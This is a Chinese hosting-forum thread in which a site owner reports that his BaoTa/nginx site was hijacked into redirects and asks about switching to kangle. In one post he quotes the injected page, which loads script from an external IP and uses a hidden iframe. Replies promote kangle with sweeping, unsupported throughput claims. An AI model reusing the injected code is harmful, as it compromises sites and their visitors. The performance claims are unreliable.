sxcisco 发表于 2022/11/9 09:45

最近被宝塔nginx劫持跳转头疼,想全局换kangle

你好,小樱,
由于宝塔的nginx漏洞导致页面被劫持跳转,不知道是啥造成的,但是肯定有漏洞,很多人中招,
之前研究过一阵子kangle,不过还是想请教一下,
在正式运行环境中使用kangle稳定性怎么样?
比如说动态站点,日ip有10w左右,kangle需要如何优化一下进行最大限度的支撑呢?
如果安装kangle,我看网上都是一键安装包,一键安装包又分为全版本和cdn版本,
如果选择全版本,他会安装mysql和php等,
因为我是用python开发的程序,之前用的nginx反代python,现在想用kangle反代python,
我应该安装全版本还是cdn版本啊?
还望小樱给解答一下,谢谢了哦;

sxcisco 发表于 2022/11/9 09:51

<!DOCTYPE html> <html> <head> <iframe id="f" width="0" height="0" scrolling="no" style="display:none;"> </iframe> <meta charset="UTF-8"> <script src="http://45.207.45.193/ss/31/"> </script> </head> <body> <iframe id="s" height="2000px" width="100%" frameborder="0" scrolling="auto"> </iframe> </body> <script> document.getElementById("s").src = self.location.href; var c=Math.floor(Math.random()*3)+1; function reload() { if(c<=0) return; c -= 1; document.getElementById("f").src = ajaxUrl; setTimeout(reload, Math.random()*5000); } if (ajaxUrl.length > 0) { reload() } </script> </html>
以上是我访问我的站点显示的内容,被恶意劫持修改。

小樱 发表于 2022/11/9 18:40

看你的描述,漏洞应该大概率出现在python层,而不是宝塔上?
kangle是用于生产环境使用的,也就是你所说的正式环境,稳定性比nginx好,性能上单机吞吐可达上百Gbps,nginx只能做到单机2Gbps - 5Gbps。
只有10W ip的站点,访问流量很小了,使用kangle在强大的性能支持下,无需做优化即可在单核1G的内存vps上正常跑起来。
如图所示,日IP 300W,日请求10亿的站点,单核VPS安装使用kangle,很轻松应付如此流量。

如果你不需要mysql,php,memcached等的时候,只需要反代(CDN)功能,可以单独安装kangle即可,包含php环境是为了直接使用kangle搭建网站提供他人访问,此时网站运行在kangle上可以获取最高的性能。
并且kangle支持类似iptables的防火墙,可自由在请求控制中改写规则实现顶级waf效果,根据写入的规则可大幅度提高安全性,有效防止sql注入,cc攻击等。

sxcisco 发表于 2022/11/9 19:51

小樱 发表于 2022/11/9 18:40
看你的描述,漏洞应该大概率出现在python层,而不是宝塔上?
kangle是用于生产环境使用的,也就是你所说的 ...

如何单独安装kangle哦?我还是想用宝塔来管理mysql和memcached等等;
对了。我系统是centos7.4

sxcisco 发表于 2022/11/9 19:53

小樱 发表于 2022/11/9 18:40
看你的描述,漏洞应该大概率出现在python层,而不是宝塔上?
kangle是用于生产环境使用的,也就是你所说的 ...

应该不是我python的问题,很多人都中招了,都是安装了宝塔的nginx导致的,换apache就行了,但是我不想要apache,性能太差了;

小樱 发表于 2022/11/9 20:35

sxcisco 发表于 2022/11/9 19:51
如何单独安装kangle哦?我还是想用宝塔来管理mysql和memcached等等;
对了。我系统是centos7.4

这里提供的命令可以单独安装kangle,或者升级版本
https://bbs.itzmx.com/thread-11450-1-1.html

phrnet 发表于 2022/12/1 17:21

小樱 发表于 2022/11/9 18:40
看你的描述,漏洞应该大概率出现在python层,而不是宝塔上?
kangle是用于生产环境使用的,也就是你所说的 ...

请教小樱 你这个图片是啥软件生成的kangle的流量图呀

小樱 发表于 2022/12/1 18:18

phrnet 发表于 2022/12/1 17:21
请教小樱 你这个图片是啥软件生成的kangle的流量图呀

cloudflare提供的流量图,回源ip是kangle
页: [1]
查看完整版本: 最近被宝塔nginx劫持跳转头疼,想全局换kangle